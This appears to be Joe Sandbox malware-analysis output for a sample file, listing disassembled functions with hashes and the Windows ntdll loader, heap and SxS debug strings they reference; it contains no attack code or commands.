                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                          • API String ID: 0-3223716464
                                                                                                          • Opcode ID: d129a0efd993316240cd70ca623efd0499ef2de6335590a97d0336afbd826880
                                                                                                          • Instruction ID: 4228e1d9e695b8da6c2fce9ac2b7500597de34ec919fc0051b4616958f82e030
                                                                                                          • Opcode Fuzzy Hash: d129a0efd993316240cd70ca623efd0499ef2de6335590a97d0336afbd826880
                                                                                                          • Instruction Fuzzy Hash: E2917972604306EFD725EFA8C980B9BBBE5EB95710F80846AFAC16F241C7709C40CB91
                                                                                                          Function 0102EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                          • API String ID: 0-1109411897
                                                                                                          • Opcode ID: 273683f5d1070ca1424b241e96c1124f3980f303ebf546235e92cb1b8308b516
                                                                                                          • Instruction ID: fcf424754b34d4c4fc994ac7fe75cadbce2e7354ab3fc743d2a4eb5f7cedbace
                                                                                                          • Opcode Fuzzy Hash: 273683f5d1070ca1424b241e96c1124f3980f303ebf546235e92cb1b8308b516
                                                                                                          • Instruction Fuzzy Hash: 77A22874A0962A8FDB64DF18C8987ADBBB5BF45344F2442E9D98DE7250DB309E85CF00
                                                                                                          Function 0101F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-523794902
                                                                                                          • Opcode ID: 2c755898af09b89530154af363409b648640668aedb63dcccc940280b1367152
                                                                                                          • Instruction ID: c7f49d8e90ad146d3a172b74fb9135e8f626007a55ee27d63ad1e93cf14102e2
                                                                                                          • Opcode Fuzzy Hash: 2c755898af09b89530154af363409b648640668aedb63dcccc940280b1367152
                                                                                                          • Instruction Fuzzy Hash: 2A420F316097828FD715DF28C484BAABBE5FF88304F1889ADE5C5CB255DB38D845CB52
                                                                                                          Function 0102ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                          • API String ID: 0-4098886588
                                                                                                          • Opcode ID: 3ca47ac61687db8d0fc9e898e43baba149aa81ff012982aa007a2567f24acf86
                                                                                                          • Instruction ID: 75f711e7b1838947cd680d8a1bf8c23a60a35722aa0250bd325cc117f3b011c1
                                                                                                          • Opcode Fuzzy Hash: 3ca47ac61687db8d0fc9e898e43baba149aa81ff012982aa007a2567f24acf86
                                                                                                          • Instruction Fuzzy Hash: 3032B170A04279CBDB62CF18C894BEEBBB5BF45744F1440E6E9C9AB251DB359E818F40
                                                                                                          Function 0103B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                          • API String ID: 0-122214566
                                                                                                          • Opcode ID: 6c8df6e987b753d784c14f9472da4c87b0fc2f51013aa867296ad0fabbd29179
                                                                                                          • Instruction ID: b83d19c7b66cc8aa9a48f0c44263f50737ea24bb70a48da9753a796e57d6a801
                                                                                                          • Opcode Fuzzy Hash: 6c8df6e987b753d784c14f9472da4c87b0fc2f51013aa867296ad0fabbd29179
                                                                                                          • Instruction Fuzzy Hash: ADC13D71A042169BDB259F6CC8807BEBBADAFC5318F14C1AAEDC1DB291DB74C944C391
                                                                                                          Function 010563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-792281065
                                                                                                          • Opcode ID: d470c5119b65d80b9e9daf2b74eb86cbbf7e394aa14abd9bbdc71c038b428ac3
                                                                                                          • Instruction ID: fddf51611a7c09f3c102af12e8159c92806b2b47ecae4c4093efb7cf921a8c5d
                                                                                                          • Opcode Fuzzy Hash: d470c5119b65d80b9e9daf2b74eb86cbbf7e394aa14abd9bbdc71c038b428ac3
                                                                                                          • Instruction Fuzzy Hash: 26918C70B003159BEF79DF14DA54BAE7BA1FF41724F8001A8E9D0AB284DBB19842DB91
                                                                                                          Function 0101645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01079A11, 01079A3A
                                                                                                          • LdrpInitShimEngine, xrefs: 010799F4, 01079A07, 01079A30
                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010799ED
                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01079A01
                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01079A2A
                                                                                                          • apphelp.dll, xrefs: 01016496
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-204845295
                                                                                                          • Opcode ID: 12a5da48b1ea48b4c197e729107c48ef7d9e17a52997ae570f0b06ada650e43c
                                                                                                          • Instruction ID: cc601ac3db208a60620891cd41d9c07ce45aa10a3a010352511b62405e24b353
                                                                                                          • Opcode Fuzzy Hash: 12a5da48b1ea48b4c197e729107c48ef7d9e17a52997ae570f0b06ada650e43c
                                                                                                          • Instruction Fuzzy Hash: 7E510F71618305AFE725EF24C881AABB7E8FB84758F00092DF5D59B1A4DB70E944CB92
                                                                                                          Function 01052674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01092160, 0109219A, 010921BA
                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01092180
                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01092178
                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010921BF
                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01092165
                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0109219F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                          • API String ID: 0-861424205
                                                                                                          • Opcode ID: cb7068e8e927111323006f3a58dd086ef76939e551b5adafedd0fad833985f9d
                                                                                                          • Instruction ID: 80da25456239a5b40581b9af7dacdd030bc5e37c3df0024d67f4f00e31d44930
                                                                                                          • Opcode Fuzzy Hash: cb7068e8e927111323006f3a58dd086ef76939e551b5adafedd0fad833985f9d
                                                                                                          • Instruction Fuzzy Hash: 5431E97AB40215B7FB21CA998C91FAF7AB8EF65A50F050059BBC46B140D370AA00D7A1
                                                                                                          Function 0105C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0105C6C3
                                                                                                          • LdrpInitializeImportRedirection, xrefs: 01098177, 010981EB
                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01098181, 010981F5
                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01098170
                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 010981E5
                                                                                                          • LdrpInitializeProcess, xrefs: 0105C6C4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                          • API String ID: 0-475462383
                                                                                                          • Opcode ID: 29514784d45eb98dc133059ffeb78eeae170e9f36d1d541aaac1a880df6bb19f
                                                                                                          • Instruction ID: d2a3e832001b1fb5c623377a780bded601bdc28c243668ba81ccf91dce0ee9d8
                                                                                                          • Opcode Fuzzy Hash: 29514784d45eb98dc133059ffeb78eeae170e9f36d1d541aaac1a880df6bb19f
                                                                                                          • Instruction Fuzzy Hash: 623104B17483069FE325EF28D985E5BB7D8BF95B10F040568F9C1AB291E660ED04C7A2
                                                                                                          Function 01039950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                          • API String ID: 0-3393094623
                                                                                                          • Opcode ID: f00456d7b2a56274efd165611182e48b2417fcea43b0d3a7bf83fdf97d5a2355
                                                                                                          • Instruction ID: 4df17ad5ac4a7d5d374a31efa93bb6d65c29ce6f2199245a5cd36674ba806e7e
                                                                                                          • Opcode Fuzzy Hash: f00456d7b2a56274efd165611182e48b2417fcea43b0d3a7bf83fdf97d5a2355
                                                                                                          • Instruction Fuzzy Hash: 970259715083458FD761DF28C1807ABBBE9BFC9708F54895EE9C98B251E7B0D844CBA2
                                                                                                          Function 0106096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 01062DF0: LdrInitializeThunk.NTDLL ref: 01062DFA
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060BA3
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060BB6
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060D60
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01060D74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 1404860816-0
                                                                                                          • Opcode ID: d48052e85a0511cada68d78912db345c5e574eed6e472e883360e5e0b25c9634
                                                                                                          • Instruction ID: 5dc602067a89ee12ac20e1f264fce05e765758122a6d264e99d697351aef2432
                                                                                                          • Opcode Fuzzy Hash: d48052e85a0511cada68d78912db345c5e574eed6e472e883360e5e0b25c9634
                                                                                                          • Instruction Fuzzy Hash: 45425C71900715DFDB61CF28C890BAAB7F9FF44314F1485AAE989DB245E770AA84CF60
                                                                                                          Function 010A4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                          • API String ID: 0-2518169356
                                                                                                          • Opcode ID: 98938cba9eb8aace0bfe00f75f93d16370fa104b83d3d8985a8d1362020f3f99
                                                                                                          • Instruction ID: 99d18f80f78281dccbf320a36cd78a5948013badc7dde633c4bd66f49dc0d3d3
                                                                                                          • Opcode Fuzzy Hash: 98938cba9eb8aace0bfe00f75f93d16370fa104b83d3d8985a8d1362020f3f99
                                                                                                          • Instruction Fuzzy Hash: 5691C0769006198BCB25CF9CC880ABEB7F4FF48310F9941A9E995E7350E375D941CB90
                                                                                                          Function 010370C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                          • API String ID: 0-3178619729
                                                                                                          • Opcode ID: 7dcbb418d26cb09abe2c4ab5b99594bc90507ac8bff9ee601f4b597b13f943d4
                                                                                                          • Instruction ID: 896f6860d67029e1ef78e89aae6841d62c60f1b165f5c575c88f4d79199208c0
                                                                                                          • Opcode Fuzzy Hash: 7dcbb418d26cb09abe2c4ab5b99594bc90507ac8bff9ee601f4b597b13f943d4
                                                                                                          • Instruction Fuzzy Hash: 7E13B1B0A00655CFDB65CF68C4907ADBBF5FF89304F1482AAE985AB381D734A945CF90
                                                                                                          Function 0103A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01087D56
                                                                                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01087D39
                                                                                                          • SsHd, xrefs: 0103A885
                                                                                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01087D03
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                          • API String ID: 0-2905229100
                                                                                                          • Opcode ID: 98e6b90acfe8888875218da74c7cba94efd756ae7701487aa14c36c075b88ebe
                                                                                                          • Instruction ID: 1a70c49aaba147d3728a162d14e6f53b3c3587e38bf6ca5017f2c2d57ec657dc
                                                                                                          • Opcode Fuzzy Hash: 98e6b90acfe8888875218da74c7cba94efd756ae7701487aa14c36c075b88ebe
                                                                                                          • Instruction Fuzzy Hash: E7D18076A00219DBDB25DF98D9C06ADBBF9EF88310F1540AAE9C5EB345D3719841CBA0
                                                                                                          Function 0102A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                          • API String ID: 0-379654539
                                                                                                          • Opcode ID: acd8180e9f0096dd2b1f270552f9ecb8458186849ad490e62968444db8656f55
                                                                                                          • Instruction ID: f1773ca90daaebbcfd4b5f1ac4585613f2969c4da4c9a93e28062b7af949e1f3
                                                                                                          • Opcode Fuzzy Hash: acd8180e9f0096dd2b1f270552f9ecb8458186849ad490e62968444db8656f55
                                                                                                          • Instruction Fuzzy Hash: 79C1BD702083A6CFD721DF58C144B6AB7E4FF88704F0449AAF9D58BA51EB34DA49CB52
                                                                                                          Function 01058402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01058421
                                                                                                          • @, xrefs: 01058591
                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0105855E
                                                                                                          • LdrpInitializeProcess, xrefs: 01058422
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-1918872054
                                                                                                          • Opcode ID: 06c23dfbd2e81c64be1e2cce19477239c79694c0e3ec1734ad73442366cda19f
                                                                                                          • Instruction ID: 19af855539d778a8a874c4413f6137903bb4cf533c6252887f4b19697b3f23e1
                                                                                                          • Opcode Fuzzy Hash: 06c23dfbd2e81c64be1e2cce19477239c79694c0e3ec1734ad73442366cda19f
                                                                                                          • Instruction Fuzzy Hash: B9917871508345AFDB62DE66CC40EABBAECFF88784F40492EFEC492151E735D9448B62
                                                                                                          Function 01030C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • HEAP: , xrefs: 010854E0, 010855A1
                                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 010855AE
                                                                                                          • HEAP[%wZ]: , xrefs: 010854D1, 01085592
                                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010854ED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                          • API String ID: 0-1657114761
                                                                                                          • Opcode ID: 8a9d12b28338890a87b7cc1a5e458533691238587621f24b04b5f88fa75121c1
                                                                                                          • Instruction ID: 0a3664805e9a4af0b0ce4392add4a0470d47ba25c3e1b32330ca2b0d3a9f7793
                                                                                                          • Opcode Fuzzy Hash: 8a9d12b28338890a87b7cc1a5e458533691238587621f24b04b5f88fa75121c1
                                                                                                          • Instruction Fuzzy Hash: 21A1153060570A9FD725DF28C844BBEBBF9BF84300F1481A9E5D68B68AD734E845CB51
                                                                                                          Function 0105273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • .Local, xrefs: 010528D8
                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 010921DE
                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010921D9, 010922B1
                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010922B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                          • API String ID: 0-1239276146
                                                                                                          • Opcode ID: 2c471c9867479f96ea178f874fe22f5797c93caec545ce304e8485432df2bc10
                                                                                                          • Instruction ID: f9b2520b91b699b28e6d9394d68b042b424d7558e759957ecb1fe79bf727c358
                                                                                                          • Opcode Fuzzy Hash: 2c471c9867479f96ea178f874fe22f5797c93caec545ce304e8485432df2bc10
                                                                                                          • Instruction Fuzzy Hash: E6A1A03590022AEBDF65CF58D884BAAB7B4BF58314F1541E9DD88AB351D7309E80CF90
                                                                                                          Function 00DF28E0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 39$gfff$gfff$yxxx
                                                                                                          • API String ID: 0-704807470
                                                                                                          • Opcode ID: 43ab4fd87e2d4637121be45053084905740c616ec4f7ce72840a3f606378f5da
                                                                                                          • Instruction ID: 810ef13b2267378f74311cdb08c152e100bec7a9c8912a15d6d4c4a6af329c53
                                                                                                          • Opcode Fuzzy Hash: 43ab4fd87e2d4637121be45053084905740c616ec4f7ce72840a3f606378f5da
                                                                                                          • Instruction Fuzzy Hash: FF71B432B0050E47DB2C8D5DC8902B9B362FBD0315F1AC239DA5ADF394E634AE518BE0
                                                                                                          Function 01054AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01093456
                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01093437
                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0109342A
                                                                                                          • RtlDeactivateActivationContext, xrefs: 01093425, 01093432, 01093451
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                          • API String ID: 0-1245972979
                                                                                                          • Opcode ID: 9de0998583ee7b1c1fcfd9f53477e08fbde17eb882221f3722874b1e595d8253
                                                                                                          • Instruction ID: 85547484b671e9fa9035975094b9aa0682bc0f1d6c509d542c889377a73766ed
                                                                                                          • Opcode Fuzzy Hash: 9de0998583ee7b1c1fcfd9f53477e08fbde17eb882221f3722874b1e595d8253
                                                                                                          • Instruction Fuzzy Hash: 7B6125366047129BDBA28F28C855BABB7E4BF80B10F158559E8D5DF240DB70E840CB91
                                                                                                          Function 010264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01080FE5
                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01081028
                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010810AE
                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0108106B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                          • API String ID: 0-1468400865
